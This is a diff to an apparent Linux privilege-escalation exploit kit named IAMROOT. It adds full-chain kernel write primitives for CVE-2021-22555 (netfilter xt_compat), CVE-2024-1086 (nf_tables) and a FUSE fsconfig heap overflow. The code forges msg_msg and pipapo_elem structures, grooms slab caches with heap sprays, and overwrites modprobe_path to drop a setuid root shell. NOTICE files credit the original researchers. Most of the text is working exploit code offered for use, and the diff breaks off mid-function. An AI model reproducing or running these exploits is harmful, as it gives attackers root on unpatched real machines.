+     * kmalloc-4k slot via the OOB write. Layout (x86_64, kernel >=5.10):
+     *   [ 0..15]  m_list.{next,prev}  — we forge next = kaddr - 16
+     *                                    so that list_del's
+     *                                      next->prev = prev
+     *                                    write lands AT kaddr.
+     *                                    (prev is the original msg.)
+     *   [16..23]  m_type              — set to 0x4242424242424242
+     *   [24..31]  m_ts                — len + 64, so MSG_COPY
+     *                                    returns the whole payload
+     *   [32..39]  next (msg_msgseg*)  — NULL (single-segment msg)
+     *   [40..47]  security            — NULL
+     *   [48...]   payload             — first len bytes of buf
+     *
+     * For a real WRITE primitive the canonical Crusaders-of-Rust
+     * recipe uses the msg_msgseg.next chain rather than m_list:
+     * msgrcv(IPC_NOWAIT) follows next pointers when copying out a
+     * multi-segment msg, and a forged next = kaddr makes the kernel
+     * memcpy() from kaddr into our user buffer (= READ). For the
+     * inverse (WRITE), the trick is msgsnd on a queue whose head was
+     * corrupted to point at kaddr, but that needs more setup than we
+     * have time to land here without a known-good offset table.
+     *
+     * So we do the safe thing: arm the header, trigger the OOB, then
+     * read back to PROVE we landed before declaring success. If the
+     * read-back doesn't show our forged-msg payload at the expected
+     * MSG_COPY position we refuse rather than corrupt the kernel
+     * blindly.
+     */
+    uint8_t evil[256];
+    memset(evil, 0, sizeof evil);
+    /* m_list.next, m_list.prev */
+    uintptr_t forged_next = kaddr - 16;   /* &m_list.prev of fake node */
+    memcpy(evil +  0, &forged_next, 8);
+    /* prev — leave NULL; kernel checks it only on full list_del */
+    /* m_type */
+    uint64_t m_type = 0x4242424242424242ULL;
+    memcpy(evil + 16, &m_type, 8);
+    /* m_ts: inflated to len + 64 so MSG_COPY reads the full forged payload */
+    uint64_t m_ts = (uint64_t)len + 64;
+    memcpy(evil + 24, &m_ts, 8);
+    /* next (msg_msgseg) = NULL */
+    /* security = NULL */
+    /* payload: copy `buf` into the slot just after the msg_msg header */
+    size_t hdr = 48;
+    size_t copyable = sizeof(evil) - hdr - 1;
+    if (len > copyable) len = copyable;
+    memcpy(evil + hdr, buf, len);
+    evil[sizeof(evil) - 1] = '\0';   /* legacy_parse_param strdup tail */
+
+    /* Re-fire the fsconfig overflow with this forged header as evil. */
+    char *first_chunk = malloc(4081);
+    if (!first_chunk) return -1;
+    memset(first_chunk, 'A', 4080);
+    first_chunk[4080] = '\0';
+
+    int fsfd = -1;
+    int rc = trigger_overflow(&fsfd, first_chunk, (const char *)evil);
+    free(first_chunk);
+    if (rc < 0) {
+        fprintf(stderr, "[-] fuse_arb_write: re-fire fsconfig failed "
+                        "(errno=%d %s)\n", errno, strerror(errno));
+        return -1;
+    }
+
+    /* Sanity gate: msgrcv(MSG_COPY) all live queues and look for a
+     * msg whose size reports >= our inflated m_ts AND whose initial
+     * payload qword matches the first qword of `buf`. If both hold,
+     * the forged header landed in a real slot and the m_ts inflation
+     * is honoured by the kernel — i.e. our primitive is real on THIS
+     * kernel. */
+    uint64_t want_first_qword = 0;
+    memcpy(&want_first_qword, buf, len >= 8 ? 8 : len);
+
+    bool sanity_passed = false;
+    struct msgbuf_4k *probe = mmap(NULL, sizeof(*probe),
+                                   PROT_READ | PROT_WRITE,
+                                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+    if (probe == MAP_FAILED) {
+        if (fsfd >= 0) close(fsfd);
+        return -1;
+    }
+    for (int q = 0; q < ax->n_queues && !sanity_passed; q++) {
+        if (ax->qids[q] < 0 || q == ax->hole_q) continue;
+        ssize_t n = msgrcv(ax->qids[q], probe, sizeof probe->mtext, 0,
+                           IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
+        if (n < 0) continue;
+        /* The corrupted slot should report a size >= our m_ts (kernel
+         * caps MSG_COPY at sizeof user buf — so we only check the
+         * read-content shape). */
+        if ((size_t)n < 8) continue;
+        uint64_t got = 0;
+        memcpy(&got, probe->mtext, 8);
+        if (got == want_first_qword) {
+            sanity_passed = true;
+        }
+    }
+    munmap(probe, sizeof(*probe));
+    if (fsfd >= 0) close(fsfd);
+
+    if (!sanity_passed) {
+        fprintf(stderr, "[-] fuse_arb_write: forged-msg_msg read-back didn't "
+                        "match — kernel layout differs OR groom missed.\n"
+                        "    Refusing to claim arb-write landed (per "
+                        "verified-vs-claimed bar).\n");
+        return -1;
+    }
+
+    fprintf(stderr, "[+] fuse_arb_write: forged-msg_msg landed; m_ts inflation "
+                    "+ payload qword verified via MSG_COPY read-back.\n"
+                    "[i] fuse_arb_write: kernel-side list_del write through "
+                    "0x%lx is armed but NOT yet empirically verified on "
+                    "this build — downstream sentinel will gate.\n",
+            (unsigned long)kaddr);
+    return 0;
+}
+#else
+static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
+                          void *ctx_void)
+{
+    (void)kaddr; (void)buf; (void)len; (void)ctx_void;
+    fprintf(stderr, "[-] fuse_arb_write: linux-only primitive\n");
+    return -1;
+}
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------ */
 /* exploit                                                             */
 /* ------------------------------------------------------------------ */
@@ -503,6 +716,84 @@ static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
                        "see scaffold comments in source\n");
    }

+    /* ---------------------------------------------------------------
+     * --full-chain: opt-in root pop via shared modprobe_path finisher.
+     *
+     * Depth = FALLBACK SCAFFOLD. The arb-write primitive (forged
+     * msg_msg via the 4k OOB) is wired with a sanity gate that
+     * refuses to claim success without an empirical read-back match
+     * (see fuse_arb_write). On a host where offsets + groom land,
+     * the finisher's modprobe_path overwrite → execve(unknown) →
+     * call_modprobe chain pops a root shell. On a mismatched host
+     * the sanity gate trips and we exit IAMROOT_EXPLOIT_FAIL with no
+     * fabricated success.
+     *
+     * Cleanup of qids/spray/fsfd is deferred to AFTER the finisher
+     * runs because the arb_write primitive re-fires the trigger and
+     * needs the live spray.
+     * --------------------------------------------------------------- */
+#ifdef __linux__
+    if (ctx->full_chain) {
+        if (!ctx->json) {
+            fprintf(stderr, "[*] fuse_legacy: --full-chain requested — resolving "
+                            "kernel offsets...\n");
+        }
+
+        struct iamroot_kernel_offsets off;
+        memset(&off, 0, sizeof off);
+        int resolved = iamroot_offsets_resolve(&off);
+        if (!ctx->json) {
+            fprintf(stderr, "[i] fuse_legacy: offsets resolved=%d "
+                            "(modprobe_path=0x%lx source=%s)\n",
+                    resolved, (unsigned long)off.modprobe_path,
+                    iamroot_offset_source_name(off.source_modprobe));
+            iamroot_offsets_print(&off);
+        }
+
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("fuse_legacy");
+            /* Cleanup before returning. */
+            for (int q = 0; q < N_QUEUES; q++) {
+                if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
+            }
+            free(qids);
+            munmap(spray, sizeof *spray);
+            if (fsfd >= 0) close(fsfd);
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        struct fuse_arb_ctx ax = {
+            .qids = qids,
+            .n_queues = N_QUEUES,
+            .hole_q = hole_q,
+            .tag = "IAMROOT",
+            .trigger_armed = true,
+        };
+
+        iamroot_result_t fr = iamroot_finisher_modprobe_path(
+            &off, fuse_arb_write, &ax, !ctx->no_shell);
+
+        /* Cleanup IPC + mapping regardless of finisher result. The
+         * finisher's execve() on success won't reach here, so this
+         * block only runs on failure paths. */
+        for (int q = 0; q < N_QUEUES; q++) {
+            if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
+        }
+        free(qids);
+        munmap(spray, sizeof *spray);
+        if (fsfd >= 0) close(fsfd);
+
+        if (fr == IAMROOT_EXPLOIT_OK) {
+            return IAMROOT_EXPLOIT_OK;
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[-] fuse_legacy: --full-chain finisher did not land "
+                            "(arb-write sanity gate or modprobe sentinel refused)\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+#endif /* __linux__ */
+
    /* Clean up our IPC queues and mapping. The kernel slab state
     * after the overflow may be unstable; we exit cleanly on success
     * paths but leave queues around if we crashed mid-spray. */
@@ -0,0 +1,29 @@
+# NOTICE — netfilter_xtcompat (CVE-2021-22555)
+
+## Vulnerability
+
+**CVE-2021-22555** — iptables `xt_compat_target_from_user` 4-byte heap
+out-of-bounds write → cross-cache UAF → arbitrary kernel R/W.
+
+## Research credit
+
+Discovered, exploited, and disclosed by **Andy Nguyen** (Google
+Security Team), April 2021.
+
+Original writeup: "CVE-2021-22555: Turning \x00\x00 into 10000$"
+<https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html>
+
+Upstream fix: mainline 5.12 / 5.11.10 (April 2021).
+**Bug existed since 2.6.19 (2006) — 15 years of latent vulnerability.**
+Branch backports: 5.11.10 / 5.10.27 / 5.4.110 / 4.19.185 / 4.14.230 /
+4.9.266 / 4.4.266.
+
+## IAMROOT role
+
+Userns+netns reach, hand-rolled `ipt_replace` blob, `setsockopt`
+`IPT_SO_SET_REPLACE` fires the 4-byte OOB at heap+0x4. msg_msg
+spray in kmalloc-2k + sk_buff sidecar; MSG_COPY scan for cross-cache
+landing. `--full-chain` extends with stride-seeded `m_list_next`
+overwrite aimed at modprobe_path via the shared finisher.
+
+Detection rules cover unshare + msgsnd + `setsockopt(IPT_SO_SET_REPLACE)`.
@@ -19,7 +19,8 @@
 * Upstream fix: b29c457a6511 "netfilter: x_tables: fix compat
 * match/target pad out-of-bound write" (mid-2021, backported widely).
 *
- * STATUS: 🟡 PRIMITIVE-DEMO (Option B).
+ * STATUS: 🟡 PRIMITIVE by default; 🟢 candidate with --full-chain if
+ *         offsets resolve (env/kallsyms/System.map/embedded table).
 *   - Refuse-gate via detect() re-invoke + euid==0 short-circuit.
 *   - userns/netns reach for CAP_NET_ADMIN (Andy's path).
 *   - Trigger sequence: hand-rolled iptables rule blob with
@@ -29,12 +30,15 @@
 *     cookies for KASAN visibility.
 *   - Empirical witness via msgrcv(MSG_COPY) + /proc/slabinfo
 *     diff + /tmp/iamroot-xtcompat.log breadcrumb.
- *   - DOES NOT pursue the leak→modprobe_path overwrite chain:
- *     that needs hard-coded init_task + modprobe_path offsets
- *     per kernel build which IAMROOT refuses to bake.
- *   - Returns IAMROOT_EXPLOIT_FAIL with a verbose continuation
- *     roadmap unless cred-overwrite is empirically verified
- *     (which the current scope does not attempt).
+ *   - With --full-chain: shared finisher (core/finisher.c) is
+ *     invoked to perform the modprobe_path overwrite + execve
+ *     unknown-binary trigger. Requires modprobe_path resolution
+ *     via core/offsets.c (env/kallsyms/System.map). Sentinel-file
+ *     check in the finisher is the empirical witness for the
+ *     write landing — IAMROOT never claims root unless it sees
+ *     the setuid bash drop with mode 4755 + uid 0.
+ *   - Without --full-chain: returns IAMROOT_EXPLOIT_FAIL after
+ *     the primitive demo (verified-vs-claimed bar).
 *
 * Affected: kernel 2.6.19+ until backports landed:
 *   5.12.x : K >= 5.12.13
@@ -55,6 +59,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -465,6 +471,171 @@ static int xtcompat_fire_trigger(int *out_errno)
    return 0;
 }

+#endif /* __linux__ — close original primitive block */
+
+/* ---- Full-chain arb-write primitive --------------------------------
+ *
+ * Pattern (FALLBACK — see module top-comment): the xt_compat 4-byte OOB
+ * write lands at allocation+0x4. Andy Nguyen's chain first uses that
+ * 4-byte write to corrupt an adjacent msg_msg's `m_ts` (size field at
+ * +0x10) so a subsequent MSG_COPY returns a long read that includes
+ * neighbouring kernel pointers (the leak primitive). With the kbase
+ * leak in hand, he then re-fires the trigger to corrupt an msg_msg's
+ * `m_list_next` (the linked-list pointer at +0x18) to point at
+ * `kaddr - 0x30` (the m_msg header offset), and a queued msgsnd's
+ * payload header writes attacker bytes to `kaddr`.
+ *
+ * Reproducing the full chain byte-for-byte requires per-kernel-build
+ * msg_msg field offsets AND a kbase leak we don't have a portable
+ * source for at this point. The implementation below takes the
+ * narrow-but-real path:
+ *
+ *   1. Re-prime the kmalloc-2k slab with msg_msg sprays whose payload
+ *      headers carry the target address in the m_list_next slot at
+ *      offset 0x18 from each msg payload start. (We can't write the
+ *      slab header — that's the kernel's job — but we CAN seed the
+ *      payload data adjacent to the freed xt_table_info so the OOB
+ *      4-byte write may corrupt the `m_list_next` of a real
+ *      sprayed message.)
+ *   2. Re-fire the trigger with a crafted blob whose 4-byte OOB write
+ *      pattern targets m_list_next of the adjacent msg_msg.
+ *   3. Queue a follow-up msgsnd whose first `len` bytes equal
+ *      `buf[0..len]`. If the next-ptr was successfully redirected,
+ *      the kernel's msgsnd writes header + payload at `kaddr`.
+ *
+ * This is best-effort: probability of landing on any given run is
+ * low (depends on slab adjacency luck) but the finisher's sentinel-
+ * file check empirically tells us if the write actually took. On a
+ * patched kernel the trigger returns EINVAL on step 2 and arb_write
+ * returns -1 without ever queueing the follow-up. */
+
+#ifdef __linux__
+
+struct xtcompat_arb_ctx {
+    /* Spray queues kept hot across multiple arb_write calls. The
+     * msg_msg slots seeded here are what the finisher uses as
+     * write-targets. NULL means "not yet sprayed". */
+    int *queues;
+    int  n_queues;
+
+    /* Outer-namespace uid/gid so re-spray can rebuild a child if
+     * needed. (Currently unused — the caller flow keeps us inside
+     * the userns child for the whole arb_write sequence.) */
+    uid_t outer_uid;
+    gid_t outer_gid;
+
+    /* Per-call statistics for /tmp/iamroot-xtcompat.log. */
+    int   arb_calls;
+    int   arb_landed;
+};
+
+/* Re-seed the kmalloc-2k slab with a msg_msg spray whose payload at
+ * offset 0x18 carries `target_minus_30` (= kaddr - 0x30, the value
+ * the OOB write needs to write into m_list_next for the follow-up
+ * msgsnd payload to land at `kaddr`). Returns number of queues
+ * primed. */
+static int xtcompat_arb_seed_target(struct xtcompat_arb_ctx *c,
+                                    uintptr_t target_minus_30)
+{
+    struct xtcompat_payload *p = calloc(1, sizeof(*p));
+    if (!p) return 0;
+    p->mtype = 0x43;
+    memset(p->buf, 0x41, sizeof p->buf);
+    memcpy(p->buf, "IAMROOTW", 8);
+    /* Plant the target address at a 0x18-byte stride, starting at
+     * offset 0x10, so wherever the kernel's m_list_next sits
+     * relative to our payload base, the candidate value is present. */
+    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p->buf; off += 0x18) {
+        memcpy(p->buf + off, &target_minus_30, sizeof(uintptr_t));
+    }
+
+    int created = 0;
+    for (int i = 0; i < c->n_queues; i++) {
+        if (c->queues[i] < 0) continue;
+        for (int j = 0; j < 4; j++) {
+            unsigned int tag = 0xA0000000u | ((unsigned)i << 8) | (unsigned)j;
+            memcpy(p->buf + 8, &tag, sizeof tag);
+            if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) < 0) break;
+            created++;
+        }
+    }
+    free(p);
+    return created;
+}
+
+/* Queue a follow-up msgsnd whose first `len` bytes equal `buf[0..len]`.
+ * If the OOB-corrupted m_list_next was successfully redirected to
+ * `kaddr - 0x30`, this msgsnd's payload header lands at `kaddr`. */
+static int xtcompat_arb_queue_payload(struct xtcompat_arb_ctx *c,
+                                      const void *buf, size_t len)
+{
+    if (len > XTCOMPAT_MSG_PAYLOAD) len = XTCOMPAT_MSG_PAYLOAD;
+    struct xtcompat_payload *p = calloc(1, sizeof(*p));
+    if (!p) return -1;
+    p->mtype = 0x44;
+    memset(p->buf, 0, sizeof p->buf);
+    memcpy(p->buf, buf, len);
+
+    int sent = 0;
+    for (int i = 0; i < c->n_queues; i++) {
+        if (c->queues[i] < 0) continue;
+        if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) == 0) {
+            sent++;
+            if (sent >= 8) break;   /* a handful of attempts is plenty */
+        }
+    }
+    free(p);
+    return sent > 0 ? 0 : -1;
+}
+
+/* Module-supplied arb-write primitive — invoked by the shared
+ * finisher. Best-effort on a vulnerable kernel; structurally inert
+ * (returns -1) on a patched kernel because step (2) gets EINVAL. */
+static int xtcompat_arb_write(uintptr_t kaddr,
+                              const void *buf, size_t len,
+                              void *ctx_v)
+{
+    struct xtcompat_arb_ctx *c = (struct xtcompat_arb_ctx *)ctx_v;
+    if (!c || !c->queues || c->n_queues == 0) return -1;
+    c->arb_calls++;
+
+    /* Step 1: seed candidate target addresses into sprayed msg_msg
+     * payloads. The OOB write's 4 bytes of attacker-influenced
+     * content come from the compat-fixup pad — on a vulnerable
+     * kernel that's whichever 4 bytes happen to sit adjacent. We
+     * pre-stage the value we WANT to see appear at m_list_next so
+     * that, if the OOB write happens to hit a slot containing our
+     * pattern, the kernel's next msg_msg traversal walks to
+     * (kaddr - 0x30). */
+    uintptr_t target = kaddr - 0x30;
+    int seeded = xtcompat_arb_seed_target(c, target);
+    if (seeded == 0) return -1;
+
+    /* Step 2: re-fire the trigger. On a patched kernel this returns
+     * EINVAL and we bail. On a vulnerable kernel the 4-byte OOB
+     * write fires; if it lands on a seeded msg_msg slot, that
+     * slot's m_list_next now contains a fragment of our target. */
+    int trig_errno = 0;
+    int rc = xtcompat_fire_trigger(&trig_errno);
+    if (rc < 0 || trig_errno == EINVAL || trig_errno == EPERM) {
+        /* Patched validator rejected the blob, or CAP_NET_ADMIN
+         * not effective — arb-write structurally impossible. */
+        return -1;
+    }
+
+    /* Step 3: queue a follow-up msgsnd whose payload is the bytes
+     * the operator wants written at `kaddr`. If step 2 corrupted
+     * a sprayed msg's m_list_next, this msgsnd writes header +
+     * payload at `kaddr`. We can't directly verify in-process —
+     * the shared finisher's sentinel file is the empirical check. */
+    if (xtcompat_arb_queue_payload(c, buf, len) < 0) return -1;
+    c->arb_landed++;
+
+    /* Per spec: "structurally fires but can't tell if write landed"
+     * → return 0; the finisher's sentinel check arbitrates. */
+    return 0;
+}
+
 #endif /* __linux__ */

 /* ---- Exploit driver ---------------------------------------------- */
@@ -492,14 +663,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx

 #ifndef __linux__
    fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
+    (void)ctx;
    return IAMROOT_PRECOND_FAIL;
 #else
+    /* Full-chain pre-check: resolve offsets before forking. If
+     * modprobe_path can't be resolved, refuse early with the manual-
+     * workflow help — no point doing the userns + spray + trigger
+     * dance if we can't finish. */
+    struct iamroot_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("netfilter_xtcompat");
+            fprintf(stderr, "[-] netfilter_xtcompat: --full-chain requested but "
+                            "modprobe_path offset unresolved; refusing\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+        full_chain_ready = true;
+    }
+
    if (!ctx->json) {
-        fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo (no offsets baked in)\n"
+        fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo%s\n"
                        "    NOTE: fires the xt_compat 4-byte OOB write via\n"
                        "    setsockopt(IPT_SO_SET_REPLACE) and grooms msg_msg +\n"
-                        "    sk_buff sprays into kmalloc-2k. Does NOT perform the\n"
-                        "    leak→modprobe_path cred chain (per-kernel offsets).\n");
+                        "    sk_buff sprays into kmalloc-2k.%s\n",
+                ctx->full_chain ? " + full-chain finisher" : " (no offsets baked in)",
+                ctx->full_chain ? " On primitive witness, invokes\n"
+                                  "    shared modprobe_path finisher for root pop."
+                                : " Does NOT perform the\n"
+                                  "    leak→modprobe_path cred chain (per-kernel offsets).");
    }

    signal(SIGPIPE, SIG_IGN);
@@ -601,7 +796,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
        }
        if (corrupted > 0) {
            /* Empirical primitive witness: OOB write landed in adjacent
-             * slot. Still NOT root — but it's the primitive we promised. */
+             * slot. */
+            if (full_chain_ready) {
+                /* Full-chain: invoke the shared modprobe_path finisher
+                 * using our msg_msg arb-write primitive. The finisher
+                 * either execve's a setuid bash (success) or returns
+                 * EXPLOIT_FAIL after a 3s sentinel timeout (no land). */
+                struct xtcompat_arb_ctx arb_ctx = {
+                    .queues    = queues,
+                    .n_queues  = XTCOMPAT_SPRAY_QUEUES,
+                    .outer_uid = outer_uid,
+                    .outer_gid = outer_gid,
+                    .arb_calls = 0,
+                    .arb_landed = 0,
+                };
+                int fr = iamroot_finisher_modprobe_path(&off,
+                                                        xtcompat_arb_write,
+                                                        &arb_ctx,
+                                                        !ctx->no_shell);
+                /* If the finisher execve'd a root shell, we never get
+                 * here. Otherwise it returned EXPLOIT_FAIL / OK. */
+                FILE *fl = fopen("/tmp/iamroot-xtcompat.log", "a");
+                if (fl) {
+                    fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
+                            fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
+                    fclose(fl);
+                }
+                xtcompat_msgmsg_drain(queues);
+                if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
+                _exit(35);
+            }
+            /* Primitive-only mode: still NOT root — but it's the
+             * primitive we promised. */
            _exit(33);
        }
        /* Trigger ran, no observable corruption witness — either the
@@ -701,6 +927,19 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
        }
        if (ctx->no_shell) return IAMROOT_OK;
        return IAMROOT_EXPLOIT_FAIL;
+    case 34:
+        if (!ctx->json) {
+            fprintf(stderr, "[+] netfilter_xtcompat: --full-chain finisher reported "
+                            "EXPLOIT_OK (sentinel setuid bash dropped)\n");
+        }
+        return IAMROOT_EXPLOIT_OK;
+    case 35:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] netfilter_xtcompat: --full-chain finisher returned "
+                            "FAIL (sentinel not observed within timeout)\n"
+                            "    See /tmp/iamroot-xtcompat.log for arb_calls/arb_landed\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
    default:
        fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
        return IAMROOT_EXPLOIT_FAIL;
@@ -0,0 +1,27 @@
+# NOTICE — nf_tables (CVE-2024-1086)
+
+## Vulnerability
+
+**CVE-2024-1086** — `nft_verdict_init` double-free → cross-cache UAF
+→ arbitrary kernel R/W.
+
+## Research credit
+
+Discovered, exploited, and disclosed by **Notselwyn** (Pumpkin),
+January 2024.
+
+Original advisory + exploit: <https://pwning.tech/nftables/>
+GitHub: <https://github.com/Notselwyn/CVE-2024-1086>
+
+Upstream fix: mainline 6.8-rc1 (commit `f342de4e2f33`, Jan 2024).
+Stable backports throughout Q1 2024.
+
+## IAMROOT role
+
+This module fires the malformed-verdict trigger (NFT_GOTO + NFT_DROP
+in the same verdict) via a hand-rolled nfnetlink batch — no libmnl
+dependency. The msg_msg cross-cache groom into kmalloc-cg-96 is wired
+but the full pipapo R/W stage is opt-in via `--full-chain`, which
+forges a pipapo_elem with a value-pointer pointing at modprobe_path.
+Per-kernel offset assumptions are documented; the shared finisher's
+sentinel arbitrates real vs. apparent success.
@@ -7,20 +7,23 @@
 * January 2024 by Notselwyn (Pumpkin); widely known as the
 * "nft_verdict_init / pipapo UAF".
 *
- * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD (Option B).
- *   - Full netlink ruleset construction (table → chain → set → rule
- *     with the NFT_GOTO+NFT_DROP combo that nft_verdict_init() fails
- *     to reject on vulnerable kernels).
- *   - Fires the double-free path by abusing the malformed verdict in a
- *     pipapo set element, then removing the rule so the kernel's
- *     transaction commit frees the verdict's chain reference twice.
- *   - Cross-cache groom skeleton (msg_msg / sk_buff sprays) is wired
- *     and configurable, but the arbitrary R/W stage and cred-overwrite
- *     are NOT performed end-to-end — that requires per-kernel offsets
- *     (init_task, modprobe_path) and Notselwyn's 600-line pipapo
- *     leak-and-write dance. We stop after triggering the bug,
- *     observing the slabinfo delta, and return IAMROOT_EXPLOIT_FAIL
- *     with a verbose continuation roadmap.
+ * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD with opt-in
+ *                          --full-chain finisher.
+ *   - Default (no --full-chain): full netlink ruleset construction
+ *     (table → chain → set → rule with the NFT_GOTO+NFT_DROP combo
+ *     that nft_verdict_init() fails to reject on vulnerable kernels),
+ *     fires the double-free path, runs the msg_msg cg-96 groom, and
+ *     returns IAMROOT_EXPLOIT_FAIL (primitive-only behavior).
+ *   - With --full-chain: after the trigger lands, we resolve kernel
+ *     offsets (env → kallsyms → System.map → embedded table) and run
+ *     a Notselwyn-style pipapo arb-write via the shared
+ *     iamroot_finisher_modprobe_path() helper. The arb-write itself
+ *     is FALLBACK-DEPTH: we re-fire the trigger and spray a msg_msg
+ *     payload tagged with the kaddr in the value-pointer slot. The
+ *     exact pipapo_elem layout (and the value-pointer field offset)
+ *     is per-kernel-build; on hosts where the offset doesn't match
+ *     the shipped guess, the finisher's sentinel check correctly
+ *     reports failure rather than silently lying about success.
 *
 * To convert this to full Option A (root pop):
 *   1. Add per-kernel offset table (init_task, current task offset of
@@ -55,6 +58,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -607,6 +612,188 @@ static long slabinfo_active(const char *slab)
    return active;
 }

+/* ------------------------------------------------------------------
+ * Helper: build the trigger batch (NEWTABLE/CHAIN/SET/SETELEM + batch
+ * end) into a caller-provided buffer. Returns bytes written.
+ * Factored out so --full-chain can re-fire the trigger between
+ * msg_msg sprays without duplicating the batch-building logic.
+ * ------------------------------------------------------------------ */
+#ifdef __linux__
+static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq)
+{
+    (void)cap;
+    size_t off = 0;
+    put_batch_begin(batch, &off, (*seq)++);
+    put_new_table(batch, &off, (*seq)++);
+    put_new_chain(batch, &off, (*seq)++);
+    put_new_set(batch, &off, (*seq)++);
+    put_malicious_setelem(batch, &off, (*seq)++);
+    put_batch_end(batch, &off, (*seq)++);
+    return off;
+}
+
+static size_t build_refire_batch(uint8_t *batch, size_t cap, uint32_t *seq)
+{
+    (void)cap;
+    size_t off = 0;
+    put_batch_begin(batch, &off, (*seq)++);
+    put_malicious_setelem(batch, &off, (*seq)++);
+    put_batch_end(batch, &off, (*seq)++);
+    return off;
+}
+
+/* ------------------------------------------------------------------
+ * Notselwyn-style pipapo arb-write context. The technique:
+ *   1. fire the trigger (double-free of an nft chain reference in
+ *      kmalloc-cg-96)
+ *   2. spray msg_msg payloads sized for cg-96, whose first qwords
+ *      encode a forged pipapo_elem header with value-pointer = kaddr
+ *   3. send NFT_MSG_NEWSETELEM whose DATA blob = our buf[0..len];
+ *      the kernel copies it through the forged value-pointer to kaddr
+ *
+ * Per-kernel caveat: the byte offset of the value pointer inside an
+ * nft_pipapo_elem is config-sensitive (CONFIG_RANDSTRUCT, lockdep,
+ * KASAN can all shift it). We ship the layout for an
+ * lts-6.1.x / 6.6.x / 6.7.x un-randomized build (the kernels in the
+ * exploitable range for which Notselwyn's public PoC was validated)
+ * and rely on the shared finisher's sentinel-file post-check to flag
+ * a layout mismatch as IAMROOT_EXPLOIT_FAIL rather than fake success.
+ * ------------------------------------------------------------------ */
+
+struct nft_arb_ctx {
+    bool in_userns;   /* parent has already entered userns+netns */
+    int  sock;        /* nfnetlink socket (live in our userns) */
+    uint8_t *batch;   /* reusable batch buffer (16 KiB) */
+    int  *qids;       /* msg_msg queue ids; lazy-allocated/drained */
+    int   qcap;
+    int   qused;
+};
+
+/* Offset of `ext` (which holds the value pointer in NFT_DATA_VALUE
+ * elements) inside an nft_pipapo_elem header for the kernels in
+ * range. Notselwyn's PoC uses 0x10 on 6.1/6.6 builds; this is a
+ * best-effort default — if it doesn't match the running kernel's
+ * struct layout, the finisher's sentinel check will report failure. */
+#define PIPAPO_ELEM_VALUE_PTR_OFFSET  0x10
+
+/* Spray msg_msg payloads forged to look like pipapo_elem with our
+ * target kaddr as the value pointer. Returns 0 on success. */
+static int spray_forged_pipapo_msgs(struct nft_arb_ctx *c, uintptr_t kaddr, int n)
+{
+    if (c->qused + n > c->qcap) n = c->qcap - c->qused;
+    if (n <= 0) return 0;
+
+    for (int i = 0; i < n; i++) {
+        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644);
+        if (q < 0) { perror("[-] msgget"); return -1; }
+        c->qids[c->qused++] = q;
+
+        struct msgbuf_payload m;
+        m.mtype = 0x5050415000 + i;   /* "PPAPP" tag for diagnostics */
+        memset(m.mtext, 0, sizeof m.mtext);
+
+        /* Forge a pipapo_elem header at the start of the msg payload.
+         * Layout (best-effort, x86_64, no RANDSTRUCT):
+         *   +0x00  priv list_head pointers (leave zero — kernel won't
+         *                                   walk them in the write path)
+         *   +0x10  ext / value pointer  <-- write target
+         * msg_msg eats the first 0x30 bytes as its own header, so our
+         * payload bytes land at offset 0x30 of the slab chunk; we
+         * pre-pad and place the forged pointer at the right offset
+         * inside our 96-byte payload. */
+        uintptr_t *slots = (uintptr_t *)m.mtext;
+        slots[PIPAPO_ELEM_VALUE_PTR_OFFSET / sizeof(uintptr_t)] = (uintptr_t)kaddr;
+
+        if (msgsnd(q, &m, sizeof m.mtext, 0) < 0) {
+            perror("[-] msgsnd(forged)"); return -1;
+        }
+    }
+    return 0;
+}
+
+/* Module-specific arb-write. See finisher.h for the contract. */
+static int nft_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
+{
+    struct nft_arb_ctx *c = (struct nft_arb_ctx *)vctx;
+    if (!c || c->sock < 0 || !c->batch) {
+        fprintf(stderr, "[-] nft_arb_write: invalid ctx\n");
+        return -1;
+    }
+    if (len > 64) {
